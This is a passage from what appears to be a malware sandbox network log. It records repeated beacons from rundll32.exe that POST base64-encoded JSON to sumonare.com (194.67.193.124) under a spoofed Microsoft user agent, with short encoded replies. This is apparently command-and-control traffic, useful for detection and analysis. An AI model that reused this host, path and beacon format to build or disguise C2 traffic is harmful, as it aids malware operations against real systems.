                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:42.892055035 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:42 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                15192.168.2.749735194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:43.034437895 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:43.842165947 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:43 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                16192.168.2.749736194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:43.988043070 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:44.792784929 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:44 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                17192.168.2.749737194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:44.955661058 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:45.773679018 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:45 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                18192.168.2.749738194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:45.929346085 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:46.732800007 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:46 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.749739194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:46.882991076 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:47.706409931 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:47 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.749740194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:47.885627985 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:48.706782103 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:48 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.749741194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:48.847162008 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:49.651117086 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:49 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.749742194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:49.802176952 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:50.635216951 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:50 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.749743194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:50.783366919 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:51.612410069 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:51 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.749744194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:51.768533945 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:52.558728933 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:52 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.749745194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:52.713269949 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:53.511651039 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:53 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                26192.168.2.749746194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:53.661037922 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
